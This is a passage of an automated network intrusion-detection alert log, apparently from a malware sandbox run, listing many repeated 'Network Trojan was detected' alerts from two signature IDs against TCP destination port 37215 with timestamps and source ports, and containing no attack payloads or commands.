              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115900
              SID:2829579
              Source Port:33060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536647
              SID:2835222
              Source Port:45934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.742963
              SID:2835222
              Source Port:53108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538050
              SID:2835222
              Source Port:38866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188648
              SID:2835222
              Source Port:38002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099596
              SID:2829579
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459612
              SID:2829579
              Source Port:59734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539908
              SID:2829579
              Source Port:33216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503587
              SID:2829579
              Source Port:33686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343075
              SID:2835222
              Source Port:35046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127218
              SID:2835222
              Source Port:38708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327824
              SID:2829579
              Source Port:44514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860321
              SID:2835222
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486160
              SID:2829579
              Source Port:56890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309236
              SID:2835222
              Source Port:53126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343025
              SID:2835222
              Source Port:37242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117169
              SID:2829579
              Source Port:36272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726213
              SID:2829579
              Source Port:48332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572578
              SID:2829579
              Source Port:54164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727088
              SID:2835222
              Source Port:51376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102427
              SID:2829579
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372001
              SID:2829579
              Source Port:52962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332223
              SID:2835222
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394911
              SID:2835222
              Source Port:52468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638236
              SID:2835222
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482800
              SID:2829579
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920548
              SID:2835222
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594805
              SID:2829579
              Source Port:33678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103483
              SID:2835222
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278183
              SID:2835222
              Source Port:56470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122930
              SID:2835222
              Source Port:36686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433678
              SID:2829579
              Source Port:53076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251575
              SID:2829579
              Source Port:52996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536314
              SID:2835222
              Source Port:33440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233722
              SID:2829579
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118514
              SID:2829579
              Source Port:59314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267176
              SID:2835222
              Source Port:39556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100562
              SID:2835222
              Source Port:53928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270696
              SID:2835222
              Source Port:49442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444806
              SID:2829579
              Source Port:56766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053917
              SID:2835222
              Source Port:51522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987387
              SID:2835222
              Source Port:42860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991849
              SID:2829579
              Source Port:34966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567353
              SID:2829579
              Source Port:45038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570669
              SID:2835222
              Source Port:56652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727249
              SID:2835222
              Source Port:54068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882451
              SID:2829579
              Source Port:53296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103671
              SID:2835222
              Source Port:38276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752034
              SID:2835222
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395136
              SID:2835222
              Source Port:36596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726355
              SID:2829579
              Source Port:35832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165240
              SID:2829579
              Source Port:34348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358583
              SID:2829579
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270641
              SID:2835222
              Source Port:34126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797570
              SID:2835222
              Source Port:56224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060768
              SID:2835222
              Source Port:60682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575603
              SID:2829579
              Source Port:60390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989504
              SID:2835222
              Source Port:45184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157044
              SID:2829579
              Source Port:48818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663630
              SID:2829579
              Source Port:50012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390719
              SID:2829579
              Source Port:52656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265899
              SID:2829579
              Source Port:52944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481435
              SID:2835222
              Source Port:56456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168015
              SID:2829579
              Source Port:49430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396163
              SID:2835222
              Source Port:43670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433569
              SID:2835222
              Source Port:49052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575382
              SID:2835222
              Source Port:51312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799051
              SID:2829579
              Source Port:40386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866449
              SID:2835222
              Source Port:56730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396437
              SID:2829579
              Source Port:41342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103376
              SID:2829579
              Source Port:54298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495282
              SID:2835222
              Source Port:57964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150879
              SID:2835222
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424080
              SID:2829579
              Source Port:59644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536385
              SID:2835222
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111451
              SID:2835222
              Source Port:57494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633656
              SID:2835222
              Source Port:36946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689845
              SID:2829579
              Source Port:56672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332400
              SID:2829579
              Source Port:54092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459788
              SID:2835222
              Source Port:56360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502056
              SID:2829579
              Source Port:54660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128674
              SID:2829579
              Source Port:54244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885275
              SID:2829579
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204659
              SID:2829579
              Source Port:59404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537749
              SID:2829579
              Source Port:57448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.829539
              SID:2829579
              Source Port:57214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064535
              SID:2829579
              Source Port:48990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245566
              SID:2829579
              Source Port:34332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048953
              SID:2835222
              Source Port:42898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828643
              SID:2835222
              Source Port:57270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233906
              SID:2835222
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113530
              SID:2829579
              Source Port:45210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253969
              SID:2835222
              Source Port:47532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574658
              SID:2835222
              Source Port:36900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.818010
              SID:2829579
              Source Port:58582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446956
              SID:2835222
              Source Port:35294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662596
              SID:2829579
              Source Port:57718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552892
              SID:2835222
              Source Port:44030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152625
              SID:2829579
              Source Port:50748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534372
              SID:2829579
              Source Port:48052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622097
              SID:2829579
              Source Port:56808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368833
              SID:2829579
              Source Port:33652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119732
              SID:2829579
              Source Port:36320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123224
              SID:2829579
              Source Port:38394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637751
              SID:2829579
              Source Port:44240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153988
              SID:2835222
              Source Port:35796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531926
              SID:2829579
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574611
              SID:2829579
              Source Port:34288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803128
              SID:2835222
              Source Port:54844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.125088
              SID:2829579
              Source Port:46762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506284
              SID:2835222
              Source Port:46214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870669
              SID:2829579
              Source Port:48044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921227
              SID:2835222
              Source Port:35722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108086
              SID:2835222
              Source Port:56864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480882
              SID:2829579
              Source Port:36366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.974283
              SID:2829579
              Source Port:35226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430409
              SID:2829579
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360873
              SID:2829579
              Source Port:36928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167392
              SID:2835222
              Source Port:36948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535948
              SID:2835222
              Source Port:38006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535846
              SID:2835222
              Source Port:38900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624123
              SID:2829579
              Source Port:59368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.266415
              SID:2829579
              Source Port:59950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518558
              SID:2835222
              Source Port:50112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685367
              SID:2835222
              Source Port:58892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431447
              SID:2829579
              Source Port:55100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485823
              SID:2829579
              Source Port:44034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430756
              SID:2829579
              Source Port:51482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701011
              SID:2835222
              Source Port:45378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398222
              SID:2829579
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148540
              SID:2829579
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545166
              SID:2835222
              Source Port:46604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505617
              SID:2835222
              Source Port:47176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693202
              SID:2835222
              Source Port:41260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097007
              SID:2835222
              Source Port:54300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623905
              SID:2835222
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245798
              SID:2829579
              Source Port:58748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347787
              SID:2829579
              Source Port:48028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186436
              SID:2829579
              Source Port:40112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923713
              SID:2835222
              Source Port:50974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303368
              SID:2835222
              Source Port:44560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.584797
              SID:2829579
              Source Port:38966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978038
              SID:2829579
              Source Port:54008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363200
              SID:2835222
              Source Port:34098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481820
              SID:2835222
              Source Port:40116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817713
              SID:2835222
              Source Port:52338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253941
              SID:2829579
              Source Port:40674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287781
              SID:2835222
              Source Port:46338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075435
              SID:2835222
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519423
              SID:2829579
              Source Port:41344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695725
              SID:2829579
              Source Port:50314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485749
              SID:2829579
              Source Port:50258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446874
              SID:2829579
              Source Port:32772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681075
              SID:2829579
              Source Port:33564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062215
              SID:2829579
              Source Port:59944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766398
              SID:2829579
              Source Port:56242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865495
              SID:2835222
              Source Port:40450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574749
              SID:2835222
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117898
              SID:2829579
              Source Port:47630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434528
              SID:2835222
              Source Port:55690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099677
              SID:2829579
              Source Port:51738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697417
              SID:2835222
              Source Port:43758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148814
              SID:2829579
              Source Port:56944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522531
              SID:2829579
              Source Port:37074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538225
              SID:2835222
              Source Port:56502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128110
              SID:2835222
              Source Port:45604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154316
              SID:2829579
              Source Port:33860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189536
              SID:2835222
              Source Port:48758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409170
              SID:2835222
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452740
              SID:2835222
              Source Port:60658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638264
              SID:2835222
              Source Port:55670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991866
              SID:2835222
              Source Port:42542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061002
              SID:2829579
              Source Port:35006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365204
              SID:2829579
              Source Port:41160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538109
              SID:2835222
              Source Port:40762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053235
              SID:2829579
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120727
              SID:2835222
              Source Port:51380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162264
              SID:2829579
              Source Port:40598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234691
              SID:2835222
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253150
              SID:2835222
              Source Port:57462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636776
              SID:2829579
              Source Port:46126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280304
              SID:2835222
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430539
              SID:2835222
              Source Port:57662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519152
              SID:2829579
              Source Port:45220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118360
              SID:2835222
              Source Port:47838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396755
              SID:2829579
              Source Port:60462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542375
              SID:2829579
              Source Port:33296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870161
              SID:2829579
              Source Port:57766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284003
              SID:2835222
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420366
              SID:2829579
              Source Port:36016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726797
              SID:2835222
              Source Port:40010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727306
              SID:2829579
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148755
              SID:2829579
              Source Port:54062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459639
              SID:2829579
              Source Port:45352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543611
              SID:2829579
              Source Port:59794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060065
              SID:2835222
              Source Port:46480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124182
              SID:2835222
              Source Port:55200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
